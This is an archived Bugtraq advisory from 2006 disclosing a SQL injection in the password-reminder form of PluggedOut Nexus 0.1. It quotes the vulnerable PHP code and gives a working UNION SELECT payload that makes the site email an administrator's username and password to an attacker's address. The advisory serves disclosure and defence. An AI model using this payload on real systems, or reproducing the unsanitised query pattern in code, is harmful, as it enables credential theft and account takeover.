PluggedOut Nexus SQL injection

To: support@xxxxxxxxxxx, admin@xxxxxxxxxxxx, "bugs@xxxxxxxxxxxxxxxxxxx" <bugs@xxxxxxxxxxxxxxxxxxx>, "bugtraq@xxxxxxxxxxxxxxxxx" <bugtraq@xxxxxxxxxxxxxxxxx>, "content-editor@xxxxxxxxxxxxxxxxx" <content-editor@xxxxxxxxxxxxxxxxx>, "editor@xxxxxxxxxxxxxxxxx" <editor@xxxxxxxxxxxxxxxxx>, "expert@xxxxxxxxxxxxxx" <expert@xxxxxxxxxxxxxx>, "news-editor@xxxxxxxxxxxxxxxxx" <news-editor@xxxxxxxxxxxxxxxxx>, "vuldb@xxxxxxxxxxxxxxxxx" <vuldb@xxxxxxxxxxxxxxxxx>, "vuln@xxxxxxxxxxx" <vuln@xxxxxxxxxxx>, "webmaster@xxxxxxxxxxx" <webmaster@xxxxxxxxxxx>, "webmaster@xxxxxxxxxxxxxxxxx" <webmaster@xxxxxxxxxxxxxxxxx>
Subject: PluggedOut Nexus SQL injection
From: h e <het_ebadi@xxxxxxxxx>
Date: Thu, 2 Mar 2006 05:57:03 -0800 (PST)
Domainkey-signature: a=rsa-sha1; q=dns; c=nofws; s=s1024; d=yahoo.com; h=Message-ID:Received:Date:From:Subject:To:MIME-Version:Content-Type:Content-Transfer-Encoding; b=MqhfB7WSn8YPMs9CN0q1P5boJe7TJn+PvygzaGtCPXmHF2E13ilDRGMgDXf+fTjBQicbIXS/DgGX7bRsGymnSACZc4yNskHxsB7v0jxVgZwOBDew3NbI1Euw28q8Q2D6BZvB1nJh4+lFiDo/FjtK5uBZWoTJEXDcNg7McW2w8rA= ;
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm

PluggedOut Nexus SQL injection
Nexus is an open source script you can run on your web
server to give you a community based website
where people can register, search each others
interests, and communicate with one another either
through a private messaging system, or via chat
requests and forums.
Project : PluggedOut Nexus
Version : 0.1
Author  : Jonathan Beckett
Home   : http://www.pluggedout.com

Credit:
The information has been provided by Hamid Ebadi .
( Hamid Network Security Team): admin[AT]hamid[o]ir
The original article can be found at:
http://hamid.ir/security/

Vulnerable Systems:PluggedOut Nexus 0.1

http://localhost/Nexus/forgotten_password.php

in this address If you fill the private email address
that you used while creating your account into the
form , the server will send you an email to that
address with your login details
Input passed to the "email" parameter in
"forgotten_password.php" isn't properly sanitised
before being used in a SQL query. This can be
exploited to manipulate SQL queries by injecting
arbitrary SQL code.

test:
in E-Mail Address form enter ' and press Send Request 
you will redirect to
http://localhost/Nexus/site_problem.php and see :

Problem with Nexus website
A problem has occurred with the Nexus website - this
was not your fault, and the administrators probably
already know about it.


Vulnerable Code: The following lines in
"forgotten_password.php" :
---------------------------~=[Vulnerable
Code]=~---------------------------
if ($_POST["submit"]!=""){
        $con = db_connect();
        $sql = "SELECT cUsername,cPassword,cEMailPrivate FROM
nexus_users WHERE
cEMailPrivate='".$_POST["email"]."'";
$result = mysql_query($sql,$con);
        if ($result!=false){
                if (mysql_num_rows($result)>0){
                        $row = mysql_fetch_array($result);
                        $from = $site_admin_email;
                        $to = $row["cEMailPrivate"];
                        $subject = "Reminder Username/Password from
".$site_long_name."";
                        $body = "This email has been sent following a
request for a reminder username/password in the
".$site_long_name." website.\n\n"
                                ."Your account details are as follows;\n"
                                ."  Username : ".$row["cUsername"]."\n"
                                ."  Password : ".$row["cPassword"]."\n\n"
                                ."If you did not request this reminder message,
please contact the ".$site_long_name." administrator
(".$admin_email.")\n";

                        send_email($from,$to,$subject,$body);

---------------------------~=[/Vulnerable
Code]=~---------------------------


exploit:

insert this code in E-Mail Address form
(http://localhost/Nexus/forgotten_password.php) :
hamidnetworksecurityteam' union select
cUsername,cPassword,'ATTACKER@xxxxxxxxxxxxx' from
nexus_users WHERE nUserId=1 and '1'='1

and ATTACKER@xxxxxxxxxxxxx  recieve email contain
username & password for userID=1 . 

Signature
 


__________________________________________________
Do You Yahoo!?
Tired of spam?  Yahoo! Mail has the best spam protection around 
http://mail.yahoo.com

Prev by Date: Re: FW: WordPress 2.0.1 Multiple Vulnerabilities
Next by Date: Re: NETGEAR WGT624 Wireless DSL router default user name/password vulnerability
Previous by thread: [SECURITY] [DSA 984-1] New xpdf packages fix several problems
Next by thread: JOOMLA CMS 1.0.7 DoS & path disclosing
Index(es):
- Date
- Thread